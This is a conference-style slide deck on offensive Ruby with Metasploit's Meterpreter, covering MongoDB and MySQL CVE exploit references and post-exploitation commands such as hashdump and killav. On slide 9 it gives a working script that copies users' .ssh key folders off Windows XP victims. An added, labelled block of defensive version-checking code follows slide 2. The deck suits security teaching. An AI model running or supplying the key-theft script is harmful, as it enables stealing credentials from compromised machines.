Slide 1

Offensive Ruby
Ausmarton Zarino Fernandes
Developer/Consultant, @ausmarton

Slide 2

Offensive Ruby: Exploiting MongoDB/Ubuntu

Vulnerability (CVE-2013-1892): specially crafted calls to the nativeHelper function in SpiderMonkey, as embedded in MongoDB, can be exploited.
Affects:
• MongoDB < 2.0.9 and 2.2.x < 2.2.4
• x86 Linux
Exploit Ref: www.exploit-db.com/exploits/24935/
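An added check, not from the deck: given a bare MongoDB version or a `mongod --version` banner, it decides whether the build falls inside the affected ranges this slide lists, so a server inventory can be triaged for patching. The banner format "db version vX.Y.Z" and the host-to-banner sample data are assumptions.

```ruby
# Added example, not from the slides: classify a MongoDB build against the
# CVE-2013-1892 affected ranges stated on the slide (< 2.0.9, and 2.2.x < 2.2.4)
# so an inventory of servers can be triaged for patching.
require "rubygems" # Gem::Version gives numeric (not string) version compare

# [lower bound inclusive (nil = none), upper bound exclusive]
CVE_2013_1892_RANGES = [
  [nil,     "2.0.9"],
  ["2.2.0", "2.2.4"],
].freeze

# Assumed banner format for `mongod --version`: "db version v2.2.3, ...".
MONGOD_BANNER_RE = /\bdb version v?(\d+(?:\.\d+)+)/

# Accepts a bare version ("2.2.3") or a mongod banner and returns the
# numeric version string. Raises ArgumentError when neither is found.
def mongodb_version_of(text)
  text = text.to_s.strip
  if (m = MONGOD_BANNER_RE.match(text))
    m[1]
  elsif text =~ /\A\d+(?:\.\d+)+\z/
    text
  else
    raise ArgumentError, "no MongoDB version in #{text.inspect}"
  end
end

# true when the version is inside one of the affected ranges.
def mongodb_vulnerable_cve_2013_1892?(text)
  v = Gem::Version.new(mongodb_version_of(text))
  CVE_2013_1892_RANGES.any? do |low, high|
    (low.nil? || v >= Gem::Version.new(low)) && v < Gem::Version.new(high)
  end
end

# Triage a host => banner map (constructed sample data in the caller) into
# the hosts that still need the fix; unparsable banners are reported apart.
def triage_mongodb_hosts(banners)
  result = { vulnerable: [], patched: [], unknown: [] }
  banners.each do |host, banner|
    begin
      bucket = mongodb_vulnerable_cve_2013_1892?(banner) ? :vulnerable : :patched
    rescue ArgumentError
      bucket = :unknown
    end
    result[bucket] << host
  end
  result
end
```

Calling `triage_mongodb_hosts("db1" => "db version v2.2.3, pdfile version 4.5", "db2" => "2.4.1")` reports db1 as vulnerable and db2 as patched.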

Slide 3

Offensive Ruby: Meterpreter

• Payload (not an exploit)
• In-memory DLL injection
• Dynamically extensible
• Client supports many languages

Slide 4

Offensive Ruby: Meterpreter (architecture diagram)

Metasploit Framework -> Victim: Exploit + Payload (Stage 1)
  Target Process: remote code execution, connect back to MSF
Metasploit Framework -> Victim: DLL Injection Payload (Stage 2)
  Meterpreter Server DLL -> Meterpreter Server
Meterpreter Client <-> Meterpreter Server: TLS/1.0 with TLV (encrypted communication between Meterpreter Client and Server)
Meterpreter Client: IRB Shell, PHP Shell

Slide 5

Offensive Ruby: Meterpreter Commands

• Core: irb, migrate, sessions, background
• Stdapi: mkdir, ifconfig, route, shell, clearev, screenshot
• Priv: getsystem, hashdump

Slide 6

Offensive Ruby: Bundled Scripts

Scripts provide more features and can be used with “run”:
• checkvm
• killav
• hostedit
• winenum

Slide 7

Offensive Ruby: Exploiting MySQL/Windows

Vulnerability (CVE-2012-5613): a FILE privilege misconfiguration in MySQL can be exploited on Windows with the use of an MOF file.
Affects (tested on):
• MySQL 5.0.45
• Windows XP SP3
Exploit Ref: www.exploit-db.com/exploits/23179/

Slide 8

Offensive Ruby: Custom Scripts

• client: client.sys.config, client.sys.process, client.net.config
• Create your .rb in /usr/share/metasploit-framework/scripts/meterpreter
• “run <script>” from meterpreter

Slide 9

Offensive Ruby: Fetching contents of .ssh

    def profile_path(profiles_reg_key, sid)
      sys_drive_var = "%SystemDrive%"
      system_drive = client.fs.file.expand_path(sys_drive_var).to_s
      # Strip any trailing NUL from the registry value and expand %SystemDrive%.
      # gsub (not gsub!) so a value without a NUL does not return nil.
      registry_getvaldata(profiles_reg_key + "\\" + sid, "ProfileImagePath")
        .gsub(/\0/, '').sub(sys_drive_var, system_drive)
    end

    if client.sys.config.sysinfo['OS'].include? "Windows XP" then
      print_status "Windows XP found, trying to get user list"
      profiles_reg_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList"
      registry_enumkeys(profiles_reg_key).flatten.each do |sid|
        path = profile_path(profiles_reg_key, sid)
        unless path.include? "systemprofile"
          ssh_keys_dir = path + "\\.ssh"
          if client.fs.file.exists? ssh_keys_dir
            print_status "Downloading ssh keys from #{ssh_keys_dir}"
            client.fs.dir.download("/tmp/", "#{ssh_keys_dir}")
          end
        end
      end
    else
      print_error "Victim is not running Windows XP, giving up!"
    end

Slide 10

Offensive Ruby: References

• www.offensive-security.com/metasploit-unleashed
• www.github.com/rapid7/meterpreter
• www.exploit-db.com
• Harmony Security's paper on Reflective DLL Injection